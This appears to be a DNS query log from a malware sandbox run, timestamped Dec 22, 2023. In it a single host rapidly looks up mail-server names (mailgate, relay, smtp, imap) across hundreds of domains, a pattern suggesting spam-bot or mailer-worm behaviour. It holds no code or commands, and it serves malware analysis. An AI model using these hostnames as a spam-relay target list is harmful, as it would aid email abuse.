Dec 22, 2023 21:15:07.980505943 CET	1.1.1.1	192.168.2.4	0xe32d	Name error (3)	relay.buyhits.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.983686924 CET	1.1.1.1	192.168.2.4	0xf14c	Name error (3)	mailgate.asdfhjlasdfhjlk1.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.999631882 CET	1.1.1.1	192.168.2.4	0x6b80	Name error (3)	mailgate.bilfinger.comqa	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.031716108 CET	1.1.1.1	192.168.2.4	0x1284	Name error (3)	mailgate.vesond.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.038527012 CET	1.1.1.1	192.168.2.4	0x9c4c	Name error (3)	mailgate.hoefakker.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.044975042 CET	1.1.1.1	192.168.2.4	0x869d	Name error (3)	imap.nhclex.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.051374912 CET	1.1.1.1	192.168.2.4	0x9387	Name error (3)	relay.harrell-associates.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.260029078 CET	1.1.1.1	192.168.2.4	0x37f0	Name error (3)	mailgate.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.286258936 CET	1.1.1.1	192.168.2.4	0x9a9c	Name error (3)	imap.91069b3d854a1035.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.286480904 CET	1.1.1.1	192.168.2.4	0x869d	Name error (3)	imap.nhclex.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.286617994 CET	1.1.1.1	192.168.2.4	0x6cd1	Name error (3)	mailgate.pkmanagment.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.286629915 CET	1.1.1.1	192.168.2.4	0x701	Name error (3)	mailgate.enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.286864042 CET	1.1.1.1	192.168.2.4	0xf06c	Name error (3)	mail.daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.286879063 CET	1.1.1.1	192.168.2.4	0xe32d	Name error (3)	relay.buyhits.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.286890984 CET	1.1.1.1	192.168.2.4	0xb919	Name error (3)	mailgate.select-feeds.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.286906004 CET	1.1.1.1	192.168.2.4	0x496d	Name error (3)	mailgate.sodataol.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.287024021 CET	1.1.1.1	192.168.2.4	0x4bf4	Name error (3)	mailgate.earnmagabucks.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.287081957 CET	1.1.1.1	192.168.2.4	0xf7ea	Name error (3)	mailgate.9a07f8a339ec2a3e.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.287173033 CET	1.1.1.1	192.168.2.4	0x7f28	Name error (3)	mailgate.hodginssmithconsulting.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.287213087 CET	1.1.1.1	192.168.2.4	0xe233	Name error (3)	mailgate.saskgmail.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.287229061 CET	1.1.1.1	192.168.2.4	0x9c4c	Name error (3)	mailgate.hoefakker.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.287242889 CET	1.1.1.1	192.168.2.4	0x6e68	Name error (3)	mailgate.rdhppx.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.287255049 CET	1.1.1.1	192.168.2.4	0xd5c9	Name error (3)	mailgate.jesusanswwers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.287334919 CET	1.1.1.1	192.168.2.4	0x343	Name error (3)	mailgate.firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.287344933 CET	1.1.1.1	192.168.2.4	0x37f0	Name error (3)	mailgate.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.287410975 CET	1.1.1.1	192.168.2.4	0x9387	Name error (3)	relay.harrell-associates.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.287421942 CET	1.1.1.1	192.168.2.4	0xf14c	Name error (3)	mailgate.asdfhjlasdfhjlk1.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.287517071 CET	1.1.1.1	192.168.2.4	0x1284	Name error (3)	mailgate.vesond.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.287528038 CET	1.1.1.1	192.168.2.4	0x6b80	Name error (3)	mailgate.bilfinger.comqa	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.287575006 CET	1.1.1.1	192.168.2.4	0x6a9e	Name error (3)	imap.nsorekek.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.298734903 CET	1.1.1.1	192.168.2.4	0x6d73	Name error (3)	smtp.integral-tours.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.298751116 CET	1.1.1.1	192.168.2.4	0x72df	Name error (3)	relay.e-manage.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.301872015 CET	1.1.1.1	192.168.2.4	0x973d	No error (0)	mailstore1.secureserver.net		68.178.213.243	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.301872015 CET	1.1.1.1	192.168.2.4	0x973d	No error (0)	mailstore1.secureserver.net		216.69.141.82	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.301872015 CET	1.1.1.1	192.168.2.4	0x973d	No error (0)	mailstore1.secureserver.net		68.178.213.244	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.303376913 CET	1.1.1.1	192.168.2.4	0xe670	Name error (3)	imap.pkmanagment.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.332032919 CET	1.1.1.1	192.168.2.4	0x9f0f	Name error (3)	relay.djaskdas.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.358982086 CET	1.1.1.1	192.168.2.4	0x2f26	Name error (3)	imap.rio-perfume.orgua	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.359631062 CET	1.1.1.1	192.168.2.4	0xdaa8	Name error (3)	mailgate.bopclip.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.362063885 CET	1.1.1.1	192.168.2.4	0xba0c	Name error (3)	imap.dinfos.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.364236116 CET	1.1.1.1	192.168.2.4	0x1eba	Name error (3)	mailgate.91069b3d854a1035.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.386054039 CET	1.1.1.1	192.168.2.4	0x16a2	Name error (3)	imap.select-feeds.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.389895916 CET	1.1.1.1	192.168.2.4	0xa715	Name error (3)	imap.jesusanswwers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.399688959 CET	1.1.1.1	192.168.2.4	0x618c	Name error (3)	mailgate.joserafael.com.ve	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.400548935 CET	1.1.1.1	192.168.2.4	0xec7e	Name error (3)	mailgate.integral-tours.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.411787987 CET	1.1.1.1	192.168.2.4	0xaa1e	Name error (3)	mailgate.hyiquu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.521590948 CET	1.1.1.1	192.168.2.4	0xacc0	Name error (3)	mailgate.ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.784475088 CET	1.1.1.1	192.168.2.4	0xaa68	Name error (3)	mailgate.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.814624071 CET	1.1.1.1	192.168.2.4	0xa715	Name error (3)	imap.jesusanswwers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.815648079 CET	1.1.1.1	192.168.2.4	0xec7e	Name error (3)	mailgate.integral-tours.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.815679073 CET	1.1.1.1	192.168.2.4	0xaa68	Name error (3)	mailgate.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.815753937 CET	1.1.1.1	192.168.2.4	0x618c	Name error (3)	mailgate.joserafael.com.ve	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.816112041 CET	1.1.1.1	192.168.2.4	0xacc0	Name error (3)	mailgate.ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.816131115 CET	1.1.1.1	192.168.2.4	0xaa1e	Name error (3)	mailgate.hyiquu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.896003008 CET	1.1.1.1	192.168.2.4	0x3876	Name error (3)	relay.gn.ais.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.939521074 CET	1.1.1.1	192.168.2.4	0xa2c7	Name error (3)	mailgate.hermanassociatesnewyork.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.962743044 CET	1.1.1.1	192.168.2.4	0xc594	Name error (3)	mailgate.freedhal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:09.078628063 CET	1.1.1.1	192.168.2.4	0xc594	Name error (3)	mailgate.freedhal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:09.172277927 CET	1.1.1.1	192.168.2.4	0xa3b9	Name error (3)	mailgate.nsorekek.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:09.204461098 CET	1.1.1.1	192.168.2.4	0x7bdf	Server failure (2)	imap.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:09.204514027 CET	1.1.1.1	192.168.2.4	0x7bdf	Server failure (2)	imap.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:09.268836975 CET	1.1.1.1	192.168.2.4	0xfec1	Name error (3)	relay.chemcaregroup.compg	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:09.416954041 CET	1.1.1.1	192.168.2.4	0x330c	Name error (3)	relay.acaiforcemaxweightloss.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:09.479511023 CET	1.1.1.1	192.168.2.4	0x8fc9	Name error (3)	relay.piiyuw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:09.867156982 CET	1.1.1.1	192.168.2.4	0xc4ab	Name error (3)	mail.williamcroy.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.043292999 CET	1.1.1.1	192.168.2.4	0x8505	Server failure (2)	pop3.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.043306112 CET	1.1.1.1	192.168.2.4	0x8505	Server failure (2)	pop3.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.103183031 CET	1.1.1.1	192.168.2.4	0xd31d	Name error (3)	relay.dresslermd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.117475986 CET	1.1.1.1	192.168.2.4	0x8e41	Name error (3)	relay.gpa.orgau	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.210791111 CET	1.1.1.1	192.168.2.4	0x2d59	Name error (3)	relay.nhclex.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.283324003 CET	1.1.1.1	192.168.2.4	0xfd61	Name error (3)	smtp.freedhal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.284198046 CET	1.1.1.1	192.168.2.4	0xa096	Name error (3)	relay.mywitce.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.379378080 CET	1.1.1.1	192.168.2.4	0x5f3f	Name error (3)	relay.aurora-resorts.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.379684925 CET	1.1.1.1	192.168.2.4	0x511f	Name error (3)	relay.mercor.compl	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.379774094 CET	1.1.1.1	192.168.2.4	0xba14	Name error (3)	relay.154892628.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.383009911 CET	1.1.1.1	192.168.2.4	0xcba7	Name error (3)	relay.arbsdecq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.387599945 CET	1.1.1.1	192.168.2.4	0xb049	Name error (3)	relay.studnets.ocps.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.389203072 CET	1.1.1.1	192.168.2.4	0x716	Name error (3)	relay.rio-perfume.orgua	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.389765978 CET	1.1.1.1	192.168.2.4	0x8158	Name error (3)	relay.taylorbryant.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.401690006 CET	1.1.1.1	192.168.2.4	0x5e19	Name error (3)	relay.cominex.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.404599905 CET	1.1.1.1	192.168.2.4	0x72b8	No error (0)	ftp.sunbeltfinancial.com		206.188.192.247	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.405178070 CET	1.1.1.1	192.168.2.4	0x2efd	Name error (3)	mail.pmcsystem.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.416006088 CET	1.1.1.1	192.168.2.4	0x60a6	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.8.34	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.416006088 CET	1.1.1.1	192.168.2.4	0x60a6	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.11.9	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.416006088 CET	1.1.1.1	192.168.2.4	0x60a6	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.8.36	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.416006088 CET	1.1.1.1	192.168.2.4	0x60a6	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.40.24	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.416006088 CET	1.1.1.1	192.168.2.4	0x60a6	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.9.2	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.416006088 CET	1.1.1.1	192.168.2.4	0x60a6	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.9.11	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.416237116 CET	1.1.1.1	192.168.2.4	0x730	Name error (3)	relay.djmeca.com.ca	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.420089006 CET	1.1.1.1	192.168.2.4	0x530e	Name error (3)	relay.souriahost.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.435950041 CET	1.1.1.1	192.168.2.4	0x5077	Name error (3)	relay.263host.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.452861071 CET	1.1.1.1	192.168.2.4	0x60a6	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.8.34	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.452861071 CET	1.1.1.1	192.168.2.4	0x60a6	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.11.9	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.452861071 CET	1.1.1.1	192.168.2.4	0x60a6	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.8.36	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.452861071 CET	1.1.1.1	192.168.2.4	0x60a6	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.40.24	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.452861071 CET	1.1.1.1	192.168.2.4	0x60a6	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.9.2	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.452861071 CET	1.1.1.1	192.168.2.4	0x60a6	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.9.11	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.459207058 CET	1.1.1.1	192.168.2.4	0x997b	Name error (3)	relay.bilfinger.comqa	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.460335016 CET	1.1.1.1	192.168.2.4	0x6e81	Name error (3)	relay.hoefakker.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.461328030 CET	1.1.1.1	192.168.2.4	0x7aeb	Name error (3)	relay.rdhppx.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.465143919 CET	1.1.1.1	192.168.2.4	0xf511	Name error (3)	ftp.pmcsystem.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.471479893 CET	1.1.1.1	192.168.2.4	0x18c3	Name error (3)	relay.dinfos.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.475362062 CET	1.1.1.1	192.168.2.4	0x5ef7	Name error (3)	relay.enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.484272957 CET	1.1.1.1	192.168.2.4	0x5806	Name error (3)	relay.asdfhjlasdfhjlk1.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.485312939 CET	1.1.1.1	192.168.2.4	0x8fba	No error (0)	mx.jk.locaweb.com.br		200.234.204.130	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.487899065 CET	1.1.1.1	192.168.2.4	0x1167	Name error (3)	relay.vesond.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.488893986 CET	1.1.1.1	192.168.2.4	0xcde2	Name error (3)	relay.9a07f8a339ec2a3e.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.491486073 CET	1.1.1.1	192.168.2.4	0x76bc	Name error (3)	relay.firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.497498035 CET	1.1.1.1	192.168.2.4	0xc745	Name error (3)	relay.select-feeds.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.499982119 CET	1.1.1.1	192.168.2.4	0xc4f	No error (0)	aero4.stememail.com		64.227.4.13	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.506093025 CET	1.1.1.1	192.168.2.4	0x7afb	Name error (3)	relay.srlbonfon9.com.hk	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.506139040 CET	1.1.1.1	192.168.2.4	0x7afb	Name error (3)	relay.srlbonfon9.com.hk	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.508589029 CET	1.1.1.1	192.168.2.4	0x33d3	Name error (3)	relay.pkmanagment.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.520838976 CET	1.1.1.1	192.168.2.4	0xca6d	Name error (3)	relay.earnmagabucks.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.523369074 CET	1.1.1.1	192.168.2.4	0x200f	Name error (3)	relay.dm.famm.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.524276018 CET	1.1.1.1	192.168.2.4	0xeb37	Name error (3)	relay.jesusanswwers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.524585962 CET	1.1.1.1	192.168.2.4	0xabe2	Name error (3)	relay.hodginssmithconsulting.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.541817904 CET	1.1.1.1	192.168.2.4	0xd7c1	Name error (3)	ftp.jiashi.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.546281099 CET	1.1.1.1	192.168.2.4	0xf511	Name error (3)	ftp.pmcsystem.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.546293020 CET	1.1.1.1	192.168.2.4	0xd7c1	Name error (3)	ftp.jiashi.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.546303988 CET	1.1.1.1	192.168.2.4	0x530e	Name error (3)	relay.souriahost.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.550544977 CET	1.1.1.1	192.168.2.4	0xccf1	Name error (3)	relay.sodataol.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.550555944 CET	1.1.1.1	192.168.2.4	0x3fab	Name error (3)	relay.saskgmail.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.639098883 CET	1.1.1.1	192.168.2.4	0xca6d	Name error (3)	relay.earnmagabucks.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.639120102 CET	1.1.1.1	192.168.2.4	0x200f	Name error (3)	relay.dm.famm.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.639213085 CET	1.1.1.1	192.168.2.4	0xabe2	Name error (3)	relay.hodginssmithconsulting.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.639405012 CET	1.1.1.1	192.168.2.4	0x33d3	Name error (3)	relay.pkmanagment.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.639441013 CET	1.1.1.1	192.168.2.4	0x76bc	Name error (3)	relay.firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.639609098 CET	1.1.1.1	192.168.2.4	0x3fab	Name error (3)	relay.saskgmail.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.639620066 CET	1.1.1.1	192.168.2.4	0xccf1	Name error (3)	relay.sodataol.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.640012980 CET	1.1.1.1	192.168.2.4	0xeb37	Name error (3)	relay.jesusanswwers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.640223980 CET	1.1.1.1	192.168.2.4	0xc745	Name error (3)	relay.select-feeds.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.640239954 CET	1.1.1.1	192.168.2.4	0xc4f	No error (0)	aero4.stememail.com		64.227.4.13	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.710545063 CET	1.1.1.1	192.168.2.4	0x76bd	Name error (3)	relay.hyiquu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.713854074 CET	1.1.1.1	192.168.2.4	0x19a2	Name error (3)	relay.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.735384941 CET	1.1.1.1	192.168.2.4	0x17ed	Name error (3)	relay.91069b3d854a1035.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.744827032 CET	1.1.1.1	192.168.2.4	0x12f0	Name error (3)	relay.joserafael.com.ve	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.747175932 CET	1.1.1.1	192.168.2.4	0xf6bc	Name error (3)	smtp.e-manage.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.767683029 CET	1.1.1.1	192.168.2.4	0xa7d9	No error (0)	aspmx2.googlemail.com		64.233.186.26	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.767837048 CET	1.1.1.1	192.168.2.4	0xdc49	No error (0)	mx003.netsol.xion.oxcs.net		51.81.206.108	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.774159908 CET	1.1.1.1	192.168.2.4	0xc198	No error (0)	viruswall.tvs-e.in		115.111.182.213	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.801740885 CET	1.1.1.1	192.168.2.4	0x19a2	Name error (3)	relay.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.808414936 CET	1.1.1.1	192.168.2.4	0x4f46	Name error (3)	relay.bopclip.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.818295002 CET	1.1.1.1	192.168.2.4	0x707d	Name error (3)	relay.ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.821724892 CET	1.1.1.1	192.168.2.4	0xbb58	Name error (3)	smtp.chemcaregroup.compg	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.847702026 CET	1.1.1.1	192.168.2.4	0x850a	Name error (3)	smtp.piiyuw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.853857040 CET	1.1.1.1	192.168.2.4	0xacc7	Name error (3)	mail.gpa.orgau	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.872283936 CET	1.1.1.1	192.168.2.4	0x17ed	Name error (3)	relay.91069b3d854a1035.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.872489929 CET	1.1.1.1	192.168.2.4	0x12f0	Name error (3)	relay.joserafael.com.ve	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.872755051 CET	1.1.1.1	192.168.2.4	0x707d	Name error (3)	relay.ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.877939939 CET	1.1.1.1	192.168.2.4	0x2f8d	Name error (3)	smtp.acaiforcemaxweightloss.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.884916067 CET	1.1.1.1	192.168.2.4	0xc122	Name error (3)	mailgate.djaskdas.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.889022112 CET	1.1.1.1	192.168.2.4	0xc684	Name error (3)	mail.hodginssmithconsulting.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.890410900 CET	1.1.1.1	192.168.2.4	0x41f3	Name error (3)	mail.263host.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.890829086 CET	1.1.1.1	192.168.2.4	0x59c7	Name error (3)	mail.bilfinger.comqa	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.899246931 CET	1.1.1.1	192.168.2.4	0xe487	Name error (3)	smtp.rio-perfume.orgua	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.899415970 CET	1.1.1.1	192.168.2.4	0xd664	Name error (3)	smtp.djmeca.com.ca	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.899578094 CET	1.1.1.1	192.168.2.4	0xa9f7	Name error (3)	mail.dinfos.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.913077116 CET	1.1.1.1	192.168.2.4	0x948b	Name error (3)	mail.saskgmail.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.915009975 CET	1.1.1.1	192.168.2.4	0x8351	Name error (3)	mail.earnmagabucks.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.923046112 CET	1.1.1.1	192.168.2.4	0x4f46	Name error (3)	relay.bopclip.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.925219059 CET	1.1.1.1	192.168.2.4	0x817b	Name error (3)	mail.aurora-resorts.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.925954103 CET	1.1.1.1	192.168.2.4	0xa1da	Name error (3)	mail.souriahost.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.930787086 CET	1.1.1.1	192.168.2.4	0x54d5	Name error (3)	smtp.mywitce.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.930855989 CET	1.1.1.1	192.168.2.4	0xa000	Name error (3)	mail.mercor.compl	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.931176901 CET	1.1.1.1	192.168.2.4	0x769d	Name error (3)	mail.joserafael.com.ve	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.931612015 CET	1.1.1.1	192.168.2.4	0xf6d8	Name error (3)	smtp.taylorbryant.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.936197042 CET	1.1.1.1	192.168.2.4	0xbacd	Name error (3)	mail.vesond.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.938602924 CET	1.1.1.1	192.168.2.4	0xaef8	Name error (3)	smtp.arbsdecq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.939615011 CET	1.1.1.1	192.168.2.4	0x4edb	Name error (3)	mail.cominex.com.au	none	none	A (IP address)	IN (0x0001)	false
